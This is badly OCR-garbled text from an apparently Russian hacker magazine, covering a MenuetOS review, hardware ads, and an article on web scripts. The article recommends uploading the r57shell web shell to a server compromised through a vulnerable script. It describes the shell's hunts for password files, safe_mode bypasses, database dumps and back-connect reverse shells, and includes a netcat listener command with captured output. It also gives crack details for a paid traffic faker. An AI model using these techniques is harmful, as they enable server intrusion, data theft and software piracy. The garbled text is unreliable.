вом углу. Словом, ничего кардинально отличающегося от привычного ин- 
терфейса нет. Фоном рабочего стола может быть любая картинка в фор- 
мате Ьтр или )ред. Расположение значков на рабочем столе тоже регули- 
руется. Можно добавлять на рабочий стол дополнительные элементы, но 
не так как это делается в ѴѴіпбоѵѵз (выбор пункта меню «создать ярлык»), 
а через специальное приложение, которое так и называется Резкіор, в ко- 
тором можно задать позицию, иконку и имя запускаемой программы. Кра- 
сивый и быстрый интерфейс — это, конечно, хорошо, но операционная 
система должна уметь делать что-то еще, кроме показывания значков на 
рабочем столе. Ценность операционной системы определяется набором 
приложений, которые под ней запускаются. Посмотрим, как с этим обсто- 
ит дело в МепиеЮЗ. В стандартной поставке МепиеЮЗ вместе с систе- 
мой идет довольно большое количество программ. Раскрой главное ме- 
ню, и ты увидишь там восемь подменю, каждое из которых содержит нес- 
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Н Поддерживает процессоры АМР АіФІоп 
64/РХ/Х2 с двуядерной архитектурой. 

М Два разъема расширения РСІ-Е хі 6 с 
поддержкой технологии БЫ. 

Н 5АТА2 РАЮ (с ПО ІЧѴ РАЮ), поддерживающий 
режимы РАЮ 0, 1 , 0+1 , ^ОР. 

Н 7.1 -канальное аудио, совместимое с АС97 ѵ.2.3. 
Н Интерфейс ІЕЕЕ1 394. 



<+> М8І 

МІСРО-ЗТАР ІМТЕРМАТЮЫАЬ 



Все вышеперечисленные функции опциональны для всех изделий МЗІ. 

МЗІ - зарегистрированная торговая марка компании Місго-ЗІаг ІпІ'І Со., 1_М. 
Спецификации могут изменяться без предварительного уведомления. 

Все зарегистрированные торговые марки являются собственностью своих владельцев. 
Любые конфигурации, отличные от оригинальных, не гарантированы. 



За дополнительной информацией обращайтесь 
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шахматы, Тетрис, Сапер и игра С4 



колько приложений той или иной категории. Названия под- 
меню ясно дают понять, что возможностей у системы доста- 
точно — Сосііпд, Іпіегпеі, Аисііо, ѲгарГіісз. На что в первую 
очередь надо обратить внимание? Подобно тому, как І_іпих 
немыслима без компилятора Си, МепиеЮЗ немыслима без 
ассемблера. Вместе с системой в комплекте идет РАЗМ, с 
помощью которого можно собирать программы для 
МепиеЮЗ. Чтобы вести разработку программ, необходим хо- 
тя бы элементарный текстовый редактор, чтобы было, в чем 
набирать текст исходников. И такой редактор в МепиеЮЗ, 
разумеется, есть. Называется он ТіпуРасІ, и кое в чем он да- 
же покруче, чем Ыоіераб в ѴѴіпбоѵѵз — он умеет подсвечи- 
вать синтаксис исходников на ассемблере. Кроме того, меня 
немало удивила поддержка русского языка — набирать 
текст на русском можно без дополнительных ухищрений, 
достаточно лишь переключиться на него в программе наст- 
ройки системы (Значок Зеіир на рабочем столе, пункт кеу- 
Ьоагб Іауоиі). Кроме русского и английского система поддер- 
живает также финский (родной язык создателя), немецкий и 
французский. Кроме средств разработки МепиеЮЗ содер- 
жит некоторое количество обычных прикладных приложе- 
ний: программы для просмотра графических форматов Ьтр 
и іред, простой графический редактор ХРаіпІ, редактор ико- 
нок, калькулятор и файловый менеджер. Отдельно стоит от- 
метить программы, собранные в меню Оетоз. В нем расположены софти- 
ны, демонстрирующие какие-либо возможности МепиеЮЗ, в основном, 
ее графического движка. Там есть, например, программа «ЗсгеепЗаѵег», 
которая демонстрирует в полноэкранном режиме красивые трехмерные 
вращающиеся фигуры. Есть программы, призванные показать, что в 
МепиеЮЗ можно создавать окна неправильной формы (например, круг- 
лые), а также окна с полупрозрачностью. 

В МепиеЮЗ присутствует сетевая часть, основанная на протоколе ТСР/ІР. 
Это означает, что из МепиеЮЗ можно выходить в сеть интернет. Правда, 
для МепиеЮЗ пока нет портированного браузера Рігеіох, но кто знает, как 
оно обернется в дальнейшем :). Зато есть некоторое количество своих 



собственных сетевых утилит, среди которых клиенты Іеіпеі, ігс, ппір, Йр, бра- 
узер и программы для работы с почтовыми протоколами рорЗ и зтір. При- 
сутствует даже клиент для игры в шахматы по интернету. Кроме клиентов 
есть еще и серверы ГіИр, Яр и етаіі. Разумеется, функциональность всех 
этих приложений гораздо меньше, чем у их аналогов из других операцион- 
ных систем, но это ничего не значит. Сетевые приложения в МепиеЮЗ 
призваны показать, что разработка таковых под эту операционную систему 
вообще возможна, и имеет смысл. В будущем, я думаю, стоит ждать от них 
улучшения функциональности, а пока они выполняют свою функцию как 
демонстрационные программы. С помощью встроенной поддержки ТСР/ІР 
можно подключиться к локальной сети, а также можно попробовать выйти 
в интернет. О том, как настроить сетевую часть МепиеЮЗ, подробно напи- 
сано в документе, который открывается при нажатии пункта меню Іпіегпеі - 
> Тооіз -> Іпіогтаііоп. Чтобы получить доступ к глобальной сети, необходим 
внешний хардварный модем. Если у тебя стоит внутренний софтовый мо- 
дем, то про интернет в МепиеЮЗ ты можешь забыть — чтобы модем зара- 



калькулятор, терминал, палитра и копия экрана 




ЗАГРУЗКА С ЖЕСТКОГО ДИСКА 

Постоянно запускать МепиеЮЗ с дискеты может надоесть, 
и возникнет потребность запускать ее с жесткого диска. 
Этого можно добиться, используя специальные загрузчики. 
Для запуска МепиеЮЗ совместно с МЗЮОЗ или ѴѴіпбоѵѵз 
9х существует программа МеОЗІ_оаб. Для работы загруз- 
чика необходимо, чтобы твой компьютер удовлетворял 
некоторым условиям. Раздел, на котором расположен 
загрузчик, должен иметь файловую систему РАТ32. 
Жесткий диск, на котором расположен этот раздел, дол- 
жен быть подключен к первому контроллеру ЮЕ и быть 
ведущим устройством (Мазіег). 

В установке загрузчика ничего сложного нет — просто 
помести файл загрузчика теозіоаб.сот в корневой ката- 
лог диска С. Туда же следует поместить инсталляцион- 
ный файл тзеіир.ехе. После этого файл теозіоаб.сот 
надо просто запустить. Из МЗЮОЗ это можно делать 
сразу, а вот если ты находишься в ѴѴіпбоѵѵз 9х, то пред- 
варительно надо перезагрузить компьютер в режиме 
Соттапб рготрі опіу. Чтобы не запускать файл 
теозіоаб.сот каждый раз вручную, ты можешь настро- 
ить загрузочное меню путем редактирования файлов 
аиІоехес.ЬаІ и сопЛд.зуз. МеОЗІ_оаб может не поддержи- 
вать некоторые версии МепиеЮЗ. Список версий, кото- 
рые успешно прошли испытания, читай в справочном 
файле, который лежит в архиве с загрузчиком. 

Для использования МепиеЮЗ вместе с ѴѴіпбоѵѵз 
ЫТ/ХР/2000 необходим другой загрузчик. Для его исполь- 
зования надо будет скопировать два файла в корневой ка- 
талог диска С и изменить файл ЬооГіпі. После этого заг- 
рузчик І\ІТІ_ОАОЕВ сам научится запускать МепиеЮЗ. Оба 
загрузчика, а также примеры конфигурационных файлов 
для ѴѴіпбоѵѵз 9х, лежат на нашем диске. 



файловый менеджер, список запущенных задач и настройки системы 











ботал, необходимы драйверы. Разработчики обычно выпускают их только 
для ѴѴіпсІоѵѵз, а про остальные платформы (даже довольно популярные) за- 
бывают. И уж если даже под І_іпих бывает проблемой найти нужный драй- 
вер, то что уж говорить про МепиеЮЗ. Для того чтобы использовать соеди- 
нение с провайдером через модем, надо будет предварительно настроить 
программу РРР. Делается это довольно необычным образом — путем из- 
менения параметров (номера телефона, имени пользователя и пароля) 
прямо в исходном тексте программы, и последующей ее пересборкой с по- 
мощью РАЗМ. Это может вызвать удивление: к чему такие трудности? На 
самом деле, все довольно просто, и такой способ изменения настроек наг- 
лядно демонстрирует на практике возможность разрабатывать и изменять 
существующее программное обеспечение непосредственно из МепиеЮЗ. 
Все, что касается предварительной настройки и использования РРР, под- 



робно расписано в файле ррр.М. Настройка соединения с ло- 
кальной сетью с помощью программы зіасксід описана в фай- 
ле зІаск.М. Кроме того, в этом довольно объемном документе 
подробно описываются все возможности и ограничения стека 
ТСР/ІР в МепиеЮЗ. 

Пора узнать, как в МепиеЮЗ обстоит дело с играми. С этим у 
МепиеЮЗ все в порядке. Есть пасьянс РгееСеІІ (аналог кото- 
рого в ѴѴіпсІоѵѵз называется «Солитер»), есть Тетрис, есть да- 
же трехмерная игра с коридорами в стиле Ооогті, правда без 
монстров и с весьма своеобразным управлением мышью. Су- 
ществует проект порти рован ия Оиаке в МепиеЮЗ. Будет 
очень любопытно взглянуть, если это удастся сделать. 

[итоги] Среди недостатков МепиеЮЗ можно отметить 
некоторую примитивность поставляемого с ней софта. 
Интерфейс многих приложений нельзя назвать образцом 
красоты и удобства. Функциональность большинства ог- 
раничена лишь самыми минимальными возможностями. 
Но никто не мешает написать свои программы под 
МепиеЮЗ, изучив ассемблер, АРІ и формат исполняемых 
файлов. К сожалению, МепиеЮЗ не умеет автоматичес- 
ки определять параметры подключенного оборудования. 
Поэтому его приходится настраивать вручную. Неподго- 
товленному пользователю наверняка будет довольно 
трудно сообразить, какие значения требуется установить в програм- 
ме Зеіир для правильной работы с железом. 

Несмотря на все недостатки, МепиеЮЗ оставляет благоприятное впе- 
чатление. В отличие от многих своих собратьев среди новых альтер- 
нативных операционных систем, она не падает от каждого чиха. Вид- 
но, что при написании кода разработчик уделял внимание стабиль- 
ности. За все время моей работы с МепиеЮЗ она ни разу не зависла. 
Можно открыть множество приложений одновременно, и никаких глю- 
ков или проблем с быстродействием не возникает. Я думаю, посте- 
пенно, в процессе разработки, эта операционная система обрастет и 
множеством качественного софта, и драйверами для распространен- 
ных устройств, и, разумеется, множеством пользователей, одним из 
которых можешь стать и ты 0 
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Скрипты на 
службе у хозяйки 

НЕСКОЛЬКО ЛЕТ НАЗАД, КОГДА ВЕБ-ПРОГРАМ- 
МИРОВАНИЕ ЕЩЕ ТОЛЬКО ЗАРОЖДАЛОСЬ, 
БОЛЬШИНСТВО ВЕБ-СЦЕНАРИЕВ ПРЕДСТАВЛЯ- 
ЛИ СОБОЙ ПРИМИТИВНЫЕ ГОСТЕВЫЕ КНИГИ И 
СЧЕТЧИКИ ПОСЕЩЕНИЙ. СЕЙЧАС ЖЕ, НАРЯДУ 
С ПРОДВИНУТЫМИ ФОРУМАМИ И СМЗ-СИСТЕ- 
МАМИ, РАСПРОСТРАНЯЮТСЯ РЕДКИЕ, НО 
ЧРЕЗВЫЧАЙНО ПОЛЕЗНЫЕ СКРИПТЫ, КОТО- 
РЫЕ МОГУТ ЗАМЕНИТЬ НЕМАЛО ОБЫЧНЫХ 

ПРОГРАММ I Степан Ильин ака Зіер (з1ер@геаІ.хакер.ш) 



Полезные скрипты 
на каждый день 

[г578ІіеІІ ѵі.23] 

Платформа: РНР 

Размер: 85 Кб 

Сайт: ѵѵѵѵѵѵ.гзіѵоісі.ги 

Админить удаленный компьютер можно по-раз- 
ному. Визуальное администрирование с помо- 
щью систем, типа Ветоіе Абтіпізігаіог 
(ѵѵѵѵѵѵ.гасітіп .сот) или 83Н-доступа — это, 
естественно, наилучшие варианты. Но что де- 
лать, если такой роскоши нет? Допустим, ты 
нашел уязвимый скрипт, и единственное, что 
ты можешь сделать — залить, на удаленный 
хост, файл. Идеальный рецепт в этом случае: 
закачать туда веб-зГіеІІ, то есть примитивную 
веб-оболочку, с помощью которой можно вы- 
полнять команды и просматривать результат 
их выполнения прямо в окне браузера. Суще- 
ствует довольно много реализаций этой идеи, 
но особого уважения заслуживает РНР-скрипт 
г57зГіеІІ от известных зесигііу-групп В8Т/ОНС. 
Рабочая лошадка, в этом скрипте все продума- 
но до мелочей. Ты когда-нибудь видел веб- 
шелл с возможностью авторизации? Я не ви- 
дел. Хотя эта банальная вещь, безусловно, мо- 
жет пригодиться, чтобы обезопасить тебя от 
использования зГіеІГа чужими лицами. Реко- 
мендую первым делом открыть исходники 
скрипта и найти в нем раздел, отвечающий за 
авторизацию. Все, что надо сделать, — устано- 
вить значение константы $аиІГі в 1, а с помо- 
щью констант $пате и $разз указать свое имя 
и пароль. После этого раздел будет иметь при- 
мерно следующее содержание: 

$аіШі = 1; //авторизация включена 
$пате='5Іер'; //логин пользователя 
$разз='тедагиІе 2 '; // пароль пользователя 

После авторизации все возможности скрипта 
— к твоим услугам. Вернее сказать, все воз- 
можные действия, которые могут быть выпол- 




нены на этой системе. Из-за различий в настройках безопасности, прав 
веб-сервера и прочих параметров список действий на одном сервере 
сильно отличается от другого. К счастью, г57зГіеІІ автоматически опре- 
деляет, какие действия выполнить возможно, а какие — нет. 

Самая главная задача веб-зГіеІГа — удаленное выполнение команд. По- 
этому в браузере ты первым делом увидишь поля для ввода команды и 
смены рабочей директории, а также большое текстовое поле, в котором 
будет выводиться результат. Чтобы облегчить себе рутинную работу, 
разработчики предлагают использовать специальные алиасы (сокраще- 
ния). По умолчанию в базу программы включено около 25 алиасов, по- 
зволяющих быстро проводить поиск файлов, разрешенных для записи, 
файлов с паролями и историю команд .ЬазГі. К примеру, если выбрать в 
меню ІіпсІ аІІ ѵѵгіІаЫе Іііез, г57зГіеІІ автоматически выполнит команду ІіпсІ 
/ Чуре I -регт -2 -Із. Скрипт использует любую возможность для выпол- 
нения команды, перебирая варианты использования инструкций ехес, 
зГіеІІ_ехес, зузіет, раззІГіги и рореп, то есть в отличие от многих анало- 
гов является универсальным. 

Благодаря г57зГіеІІ, ты получаешь возможность легко закачивать на сер- 
вер все необходимые файлы, причем как с локального компьютера, так 
и с удаленного сервера, используя ѵѵдеі, ІеІсГі, Іупх, Ііпкз, деі или сигі. Ты 
можешь закачать все необходимые утилиты (сканеры, эксплойты, прок- 
си без логов, другие скрипты и т.д.), отконфигурировать их и, если по- 
зволяют права, даже запустить. 

Несмотря не небольшой размер, скрипт имеет в своем арсенале еще не- 
мало полезных функций. Скрипт собирает всю необходимую информа- 
цию об удаленном сервере (версия оси, рГіріп!о(), рГір и веб-сервера и 
т.д.). В код г57зГіеІІ встроено несколько приемов для обхода ограниче- 
ний заІе_тосІе, препятствующих удаленному выполнению многих задач. 
В конце концов, в него встроены компоненты для работы с базами дан- 
ных (Му80І_, М880Ц РозІдге80І_ и Огасіе): снятие дампа, произвольный 
запрос, просмотр структуры таблиц. Все это удовольствие работает как 
под ѴѴіпсІоѵѵз, так и под *піх-ЬазесІ ОС, причем г57зГіеІІ необязательно 
юзать через браузер: к твоим услугам функции Ьаск-соппесі и ЬіпсІ-зГіеІІ. 
Подробнее о них читай во врезке. 

Альтернатива: г57рѵѵз 1.0 (регі, Мір://гзі. ѵоісІ.ги/сІО]л/пІоасІ/г57рш.Ш) . 




выполняем команду сііг на ѴѴіпсІоѵѵз-сервере 




джентльменский набор разработчика (Денвер) — отличная возможность 
проверить скрипты под ѴѴіпсІоѵѵз 




[В8Т Му80І_ ѵ2.0] 

Платформа: РНР 



Размер: 79 Кб 



Сайт: ѵѵѵѵѵѵ.гзі.ѵоісі.ги 



авторизация на веб- 
шелле: чужой не 
пройдет! 



Каждый знает, что таблицы МуЗОІ_ могут быть 
легко отредактированы на сервере с помощью 
мощного скрипта рГірМуАбтіп ( ѵѵѵѵѵѵ .рЬртуад - 
тіп.пеі). Работа с базами данных осуществля- 
ется прямо через окно браузера, от тебя лишь 
требуется залить архив с дистрибутивом скрип- 
та на сервер. Но именно здесь и возникают проблемы. Во-первых, ди- 
стрибутив рГірМуАбтіп занимает почти 3 Мб, соответственно, распако- 
ванный — еще больше. Во-вторых, сильно напрягает огромное количе- 
ство РНР-файлов, из которых компонуется скрипт: ими крайне неудоб- 
но оперировать и еще сложнее установить скрытно на сервер. Но это 
еще не все. Недостаток рГірМуАбтіп заключается еще и в том, что па- 
роль к БД хранится в открытом виде прямо в текстовых конфигах скрип- 
та. Это явно не делает его почетным, и вообще говоря, является серьез- 
ной дырой в безопасности. 

Думаю, я смог убедить тебя в необходимости альтернативы :). Достойно 
укрепиться в этой должности все шансы имеет скрипт ВЗТ МуЗОІ_ 2.0. 
Нашел я его недавно, но сразу понял, что это именно то, что надо. Ми- 
ниатюрный скрипт, который в архиве занимает всего 17 Кб, по функцио- 
нальности ничуть не уступает гигантскому рГірМуАбтіп. Суди сам: уста- 
новив ВЗТ МуЗОІ_ на сервер, ты сможешь просматривать и редактиро- 
вать любые базы, которые доступны для твоего аккаунта, или даже соз- 
давать новые, если ты являешься администратором. Все действия вы- 
полняются визуально, то есть на интуитивном уровне. Для того, чтобы 
отредактировать, просмотреть и создать новую таблицу в БД, тебе не 
нужно знать язык ЗОІ_ — все это за тебя сделает ВЗТ МуЗОІ_ 2.0. Если 
же ты хочешь укрепить свои позиции в составлении 301-запросов, то 
скрипт вообще для тебя окажется большой находкой. Любое действие, 
которое он совершает, сопровождается текстом ЗОІ_-запроса, поэтому 
он легко усваивается. Понаблюдав, можешь попробовать составить за- 
просы вручную — ВЗТ МуЗОІ_ с удовольствием их обработает. Можно 
редактировать абсолютно все: любые поля (названия столбцов) табли- 
цы, содержание, связи и т.п. Отличной фишкой является возможность 
создания дампа (копии) БД или отдельных таблиц, которые ты можешь 
просмотреть в браузере или отправить по НТТР. Все эти функции легко 
поместились в один небольшой файл, который не нужно конфигуриро- 
вать и легко залить на сервер. 

Альтернатива: ѴѴігМуЗОІ-АсІтіп (РНР, ѵѵіг.РіотеІіпих.пеІ/рІір.рГір), регіту- 
асітіп (РегІ, ѵѵѵѵѵѵ.регітуасітіп.сіе). 



[РНР ГХР 3.0] 

Платформа: РНР 



Размер: 11 Кб 



Сайт: ІіНр://Ьф.Наггут.пи/рІірЬф 

С появлением высокосортных 
инет-каналов все меньше стала 
ощущаться необходимость ло- 
кально хранить какие-то файлы. К 
моменту следующей установки 
привычной программы в инете на- 
верняка будет выложен ее свежий 
релиз. Ооодіе.сот индексирует 
ежедневно миллионы документов, 
из которых найти нужный намного 
легче, чем перебирать на винте 
когда-то сохраненные веб-стра- 
нички. Спору нет — удобно, но 
есть и проблемы. 

Мне, например, не раз приходи- 
лось копировать большие объемы 
с одного РТР-сервера на другой. 
Каждый решает эту задачу по-сво- 
ему. Кто-то будет действовать на- 
пролом: выкачает файлы сначала 
на свой компьютер, а потом за- 
льет в нужное место. Другой, не 
понаслышке знакомый с техноло- 
гией РхР, воспользуется продви- 
нутым РТР-клиентом. Но есть еще 
один способ — использовать спе- 
циально заточенный под эту зада- 




О 




Не стоит забывать, что все 
действия взломщиков 
противозаконны и эта 
статья предназначена 
лишь для ознакомления. 
За применение материала 
в незаконных целях автор 
и редакция ответственно- 
сти не несут. 

Лучший способ опериро- 
вать файлами на удален- 
ном сервере — использо- 
вать скрипт рйрРешоіеѴіеѵѵ 
(шшш.рйр.зрЬ.ги). Уверяю 
тебя, ты не разочаруешься. 

шѵѵш.ШзсгірІз.сот — 
огромная подборка скрип- 
тов на РНР/РЕРШ8Р и т.д. 
шшш.хЛогиш.іпІо — отлич- 
ный раздел «веб -скрип- 
ты», для активных участ- 
ников — доступ к огром- 
ной подборке нуленых 
скриптов. 

Шр:/Дац5.огд.ш/ргодг/шеЬ_ 
Іапд/регІ_ѵѵеЬ2.Ыт — ру- 
ководство на случай, если 
какой-либо из РегІ-скрип- 
тов не заработает. 



чу скрипт. Признаться, мне приш- 
лось потратить немало времени, прежде чем я нашел что-то работоспо- 
собное: большинство скриптов по разным причинам отказывались кор- 
ректно работать, несмотря на предельную простоту задания. С самой 
лучшей стороны показал себя скрипт РНР РХР 3.0. Для его установки 
многого не требуется: нужно распаковать архив с дистрибутивом и под- 
править переменные $игІ и $раіГі в файле сопіід.іпс.рГір. После этого все 
файлы и директории необходимо залить на сервер, а после передачи 
выставить права (сіітосі) 777 на директорию Зіоге и все файлы, находя- 
щиеся в папке баіа. Теперь можно открывать файл іпсІех.рГір в браузе- 



ВАСК-СОММЕСТ ѴЗ. ВІМО-ЗНЕЦ. 

Очень часто для нормальной работы с удаленным серве- 
ром через іеІпеі/ЗЗН мешает файрвол, который блокирует 
обращения к этим портам извне. В этом случае могут по- 
мочь два подхода. Оба включены в состав г57зИеМ. 
ВіпсІ-зІіеІІ. Скрипт открывает на удаленном хосте сокет на 
заданном порту, который не фильтруется файрволом (если 
такой порт вообще есть), и привязывает к нему стандарт- 
ный Ьазіі-интерпритатор /Ьіп/Ьазіі. Тебе остается с помо- 
щью іеіпеі'а подключиться к нему и радоваться жизни. 
Васк-соппесі. Этот способ подходит, когда правила файр- 
вола на удаленном хосте фильтруют практически все под- 
ключения, и возможности забиндить порт нет. Использова- 
ние Ьаск-соппесі подразумевает, что инициировать под- 
ключение будешь не ты, а сам сервер, который попробует 
подключиться к указанному ему порту заданного ІР-адре- 
са. На принимающей стороне это соединение нужно при- 
нять с помощью чудо-программы пеісаі (і пеісаі.зоигсеіог - 
де.пеі), после чего можно отдавать команды, как на обыч- 
ном шелле. Если Ьаск-соппесі настроен на 40000, то запу- 
скать пеісаі нужно примерно так: 

<±\хакер>пс.ехе -I -п -ѵ -р 40000 

Іізіепіпд оп [апу] 40000 ... 

соппесі іо [ххх.ххх.ххх.хх] ігот (ІІІ\ІКІ\ІОѴѴІ\І) [хх.хх.ххх.хх] 
54247 

І_іпих дѵѵ 2.4.8-ас5 #2 ЗМР Тые Зер 25 21:36:58 МЗЭ 2001 
І686 ипкпоѵѵп 

иісІ=60001 (поЬосІу) діб=60001 (поЬосІу) 
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ВЗТ МуЗОІ_: главное меню 




лывать параметры окружения и заходить на страницу каж- 
дый раз с разных ІР-адресов. Заниматься этим вручную — 
бред по определению, но зато с задачей на ура справля- 
ются такие пакеты, как Раке2Ша. 

Не буду таить, трафик-генераторы — это довольно уни- 
кальные и редкие скрипты, в отличие от форумов и СМ3, 
они на каждом углу не валяются. Скажу больше: бесплат- 
ного, но вместе с тем достойного скрипта, мне найти так и 
не удалось. Да-да, Раке^Ша — тоже коммерческий скрипт, 
так как это профессиональный инструмент, и разработчи- 
ки вполне резонно требуют за его использование денег 
(ни много - ни мало, а $160). Чтобы не разорять карманы 
российских граждан, релиз нуленой версии (то есть с вырезанным 
участком кода, отвечающего за регистрацию) Раке^Ша выпустила 
группа ОТТ. Ее можно скачать отсюда — Шр://зсгіріз.уѵтІга- 
сІег.сот/рЬрАТМ.ѵ.1 .ІО.ІгапзІаІесІ.Ьу.ОТТ.лр. в архиве найди файл /с/а- 
іа/аиіМ и замени первые его две строчки на: 

Зс024Т1 361 8Т64Т5сІ7025а5492ес7сІа5 
341930сШ58Ь742сЗессЗсі6Ьс60с736 



!— і ѵт і ‘■і" БІШІШѴій 




для работы с ВЗТ МуЗОІ_ нужно предварительно авторизироваться 



ре и любоваться... не- 
казистым интерфей- 
сом РНР РХР 3.0. Что 
он умеет? Всего лишь 
перекачивать файлы 
между РТР, НТТР, од- 
нако большего от него 
и не требуют. Когда я 
скачивал этот скрипт, 
я думал, что он, как и 
все модные РТР-кли- 
енты, использует тех- 
нологию РХР, ан нет. 

Оказалось все в точ- 
ности до наоборот. 

Скрипту абсолютно по барабану, поддерживают ли РТР-серверы пере- 
дачу через РХР — он использует другой примитивный, но вполне со- 
стоятельный подход. Файл с удаленного сервера сначала скачивается 
во временную папку, после чего передается на сервер-назначение. Та- 
кой подход позволяет передавать файлы не только с РТР на РТР, но и, 
например, с НТТР на РТР и т.д. Другие аналогичные скрипты имели 
один серьезный недостаток — они умели передавать только одиночные 
файлы. РНР РХР умеет рекурсивно обходить каталоги и передавать це- 
лые директории с сохранением иерархии. 

Сказка, но не совсем. Для работы утилиты необходимо иметь значитель- 
ное количество свободного пространства на сервере: по крайней мере, 
не меньше объема файлов, которые ты собираешься передавать. Да и 
трафика будет расходоваться не меньше. Более того, скрипт работает 
только в том случае, если директива РНР заІе_тосІе отключена — обя- 
зательно выясни это у провайдера, прежде чем начинать эксперименты 
Альтернатива: Х-ІІрІоасІег (РегІ, тт.. хакер. ги/розі/ 1201 9). 

[Гаке2М1а АсІѵапсесІ Сепегаіог.ѵ2.3] 

Платформа: РНР 

Размер: 196 Кб 

Сайт: ѵѵѵѵѵѵ.ІакегіІІа.сот 

Увеличить посещаемость сайта — мечта любого веб-мастера. В Сети 
некоторые конторы делают огромные деньги на так называемом 5ЕО 
(ЗеагсІі Епдіпез Оріітігаііоп — оптимизация для поисковых машин). 
Рассматривать тему ЗЕО мы сегодня не будем, но зато разберемся, 
как всего за пару минут можно обеспечить наплыв уникальных посе- 
щений (хостов) твоего сайта. Естественно, это будут не настоящие по- 
сетители, а всего лишь трафик, эмулированный с помощью специаль- 
ных скриптов трафик-генераторов. Любые рейтинги и сервисы, предо- 
ставляющие счетчики посещений (например, Іор.таіІ.ги) имеют спе- 
циальный механизм, который отделяет уникальные посещения (хосты) 
от повторных (хитов). Реализуется он на базе анализа параметров 
пользователя: его ІР-адреса, а также переменных окружения, которые 
содержат название и версию браузера, тип операционной системы, 
сведения об установленном в системе языке и т.п. Обмануть систему 
сложно, так как для этого нужно самым тщательным образом подде- 



После этого все файлы заливай на свой веб-сервер и вызывай в брау- 
зере файл іпбех.рГір. Перед тобой появится страница для авторизации. 
Для входа используй логин/пароль — ѵѵагегоѵег/СусораІП. Если все 
сделано правильно, то уже через мгновение ты сможешь изучить пунк- 
ты главного меню Раке^Ша. Разработчики приложили максимум уси- 
лий, чтобы работать с программой было максимально просто. С помо- 
щью интерактивного меню ты сможешь добавить сколько угодно прок- 
си-листов, списки Веіеггегз (заголовок, указывающий ссылку, с кото- 
рой пришел посетитель), списки Іізег-Адепіз (название и версия брау- 
зера, идентификатор ОС и прочие параметры, которые в обязатель- 
ном порядке передаются веб-серверу). Примечательно, что все 
необходимые файлы в огромном количестве уже включены в Раке^іІ- 
Іа, однако ты всегда сможешь добавить свои собственные. Прокси-ли- 
сты можно купить, а что касается Іізег-Адепіз и Ріеіеггегз, то их можно 
извлечь из логов любого веб-браузера. Встроенные утилиты Раке2Ша 
в этом случае будут как нельзя кстати. Запустить эмулятор трафика — 
сущий пустяк. Укажи точный адрес своей веб-страницы, выбери фай- 
лы с прокси, Веіегег, ІІзег-АдепІ и жми Вип депегаіог. Появится стра- 
ничка, где ты в реальном времени сможешь проследить за выполнени- 
ем задания. С помощью дополнительных опций можно ограничить чи- 
сло посещений в час и суммарное количество трафика. Вещь! 
Альтернатива: Раке Ѵізііогз (РегІ, уѵуѵуѵ.тгпісерадез.сот/іакеШз) © 



ГДЕ ВЗЯТЬ ХОСТИНГ? 

Хостинги бывают разные: стабильные и не очень, бесплат- 
ные и платные, быстрые и тормозные. Если желания пла- 
тить за хостинг нет, то довольствоваться придется бес- 
платными, но это накладывает массу неудобств. Во-пер- 
вых, бесплатные хостинги всячески ограничивают возмож- 
ности пользователей: урезают ширину канала, подключают 
неприятные директивы в настройках МуЗОІ_, РНР и т.д. Во- 
вторых, они не отвечают за работоспособность сайта и, 
естественно, не осуществляют его техническую поддержку. 
Если какой-то из скриптов откажется работать, единствен- 
ным выходом будет использование другого хостинга. Тем 
не менее, в некоторых случаях бесплатные хостинги мож- 
но использовать вполне успешно. Из отечественных по- 
пробуй і /ѵѵѵѵѵ.уагсі.ги, ѵѵѵѵѵѵ.ііоіт.ги, ѵѵѵѵѵѵ.оіі.ги , из иностран- 
ных — і/іл/іл/і/. 5дідз. сот, ѵѵѵѵѵѵ.Іюзі.зк, ѵѵѵѵѵѵ.ІгееІіозі4уои.сот, 
іесЫгеІапсІ.са. 

Если спросишь меня, то на бесплатные хостинги я бы да- 
же не стал тратить время. Сегодня немало хостинг-ком- 
паний предлагают свои услуги от 1 — 2$ в месяц. Есте- 
ственно, сервис за такие деньги — не фонтан, но для ра- 
боты небольшого сайта или упомянутых в статье скрип- 
тов вполне хватит. В любом случае ты сможешь пому- 
чить его службу поддержки, попросить установить нуж- 
ный РЕПІ_ или РНР-модуль, прописать в настройках 
АрасИе'а или РНР необходимую директиву. Выбрать 
платный хостинг непросто. Для того чтобы сделать пра- 
вильный выбор, рекомендую проштудировать раздел 
«Хостинг» на форуме іогит.ги-Ьоагд.сот, а также сайт 
ѵѵѵѵѵѵ.ііозіоіэгог.ги . 




Кр-клиент, встроенный в РНРРХР: выбираем 
файлы для передачи 











Рохсопп — торговая 
марка Ноп Наі Ргесізіоп 
Іпсіизіігу Со., Ыісі - мирового лиде- 
а в области высокотехнологичных 



предприятиях Рохсопп 

■ всем странам 
фа, более 
160 тысяч 
человек. 



решений. Рохсопп - крупнейшая частная 
тайваньская компания, №1 в мире по ОЕМ- 
поставкам системных плат, разъемов и 
корпусов для ПК, №2 в мире по выпуску 
систем охлаждения. В 2004 году объем 
продаж компании превысил $16 млрд. 
Количество сотрудников, занятых на 



Чипсет ІпТеІ 915РІ_; 

ЮА775 для Іпіеі Репііит 4ЕЕ/Рге$соИ СРІІ; 
Р5В800; Биаі сЬаппеІ РОК 400/333 х 2 РІММ5; 
1 х Р-АТА, 4 х 5-АТА 1 50 (РАЮ 0, 1, 0+1); 

Аисііо 7.1; СЬЕ ЬДИ; ІЕЕЕ 1394а; 
до 8 портов 115В 2.0; 

1 х РСІех 16, 1 х РСІех 1, 3 х РСІ, 1 х РСЕ 8Х 
Рохсопп Р.С.Е. 8Х совместим с АСР 8Х, 
поддержка 2х мониторов 
(ѴѴіпсіоѵѵб 2000/ХР) и МісгозоЙ РігесІХ 9.0. 



Чипсет пѴЮІА ЫР4 Шіха; 

Боскеі 939 для АМР АіЫоп™ 64/64РХ СРІІ; 

Р5В 2000 МТ/5, НурегТгапзроП™; 

до 4СВ Риаі сЬаппеІ РРР400/РРРЗЗЗ/РРР266; 

1 х РСІе Х16, 2 х РСІе XI , 4 х РСІ; 

4 х Бегіаі АТА II (РАЮ 0, 1, 0+1); 

Аисііо 7.1, АС97; СЬЕ І_АІМ, ІЕЕЕ 1394а; 
до 8 портов 115В 2.0 






СА 5 Ь':« п ССЮ1ЕН5 



Собственное производство высококачественной стали • Лицевые панели изготовлены в соответствии со стандартами ведущих мировых производителен 
Легендарные блоки питания Р5Р, НіРго, СѴѴТ • Сборка ПК без использования инструмента во всех моделях корпусов 
Дополнительные вентиляторы и 115В панели в базовой конфигурации • Более 100 моделей во всех ценовых категориях 
Широкий ассортимент вентиляторов для процессоров АМР и Іп*еІ 



РОХСОПП’ 

Абѵапсіпд ТЬгоидН Іппоѵаііоп 

